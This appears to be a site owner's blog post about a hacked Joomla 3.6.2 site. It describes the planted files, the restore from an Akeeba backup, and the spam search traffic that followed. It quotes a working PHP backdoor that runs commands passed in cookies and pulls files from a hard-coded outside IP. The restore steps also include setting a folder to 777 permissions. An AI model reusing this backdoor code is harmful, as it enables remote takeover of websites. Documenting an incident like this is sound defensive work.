Had a recent Joomla 3.6.2 install go blank. Site was fine one day and the next it was unreachable.

I FTP’ed into the site and I see WordPress folders in there and other strange files. There was a zip file called “cms brute rmf 3.0.zip”. Thre were odd PHP files such a “ebb6bff35a.php”. Look like an attack for sure. The PHP file was extremely complex.

The file “ebb6bff35a.php” starts out by grabbing the id set in a cookie for “user id” then points back the following ip with the cookie information. This IP stems from Belize.

if (isset($_COOKIE[“id”])) @$_COOKIE[“user”]($_COOKIE[“id”]);

if( isset($_REQUEST[“test_url”]) ){

echo “file test okay”; }

$f =$_GET[“d”];

$id=$f;

$current = file_get_contents(“http://80.87.205.79/$f”);

file_put_contents($id, $current);

if (!defined(‘PCLZIP_READ_BLOCK_SIZE’)) {

define( ‘PCLZIP_READ_BLOCK_SIZE’, 2048 );

}

files_in_joomla_install

Hopefully I can figure out what happen, but I am worried about security for sure.

 

After contacting Godaddy it looks like a complete attack. Uploaded PHP files, directories were created, and I didn’t get to check the database. Had to do a GoDaddy account reset and restore from an Akeeba backup.

The backup didn’t go well I got the following error.

akeeba_ajax_error

I followed the instructions on this page.

https://www.akeebabackup.com/documentation/troubleshooter/kscantextract.html

I had to create the “kicktemp” folder. Set the permissions to 777.  Set the type of install to FTP. For the root directory I had to use “/”.  Make sure to test the FTP connection.

The Kickstart restore took about 25 minutes to restore.

Here are the specs on the site.

  • Joomla 3.6.2
  • JCE
  • Akeeba
  • Chronoforms
  • JO Facebook Events Pro
  • Hot Themes Hot Fitness template.

One of the worst parts of this whole debacle is their SEO. The site was live for a month before the attack and the analytics were clicking along nicely. The site was getting around 300 plus hits a in the first month with around 100 key word matches.

During the attack the number of key word matches jumped to 16,000 matches and incredibility junky results.

analytics

This is a running store and have nothing to do with “sexy turkey”.  This all happened in just a few days. I really hope this doesn’t offend Google and they decide to block the site.

I hope this helps someone else out there…

 

Follow up:

A month later after this attack I looked at all of the directories and found no trace of another attack.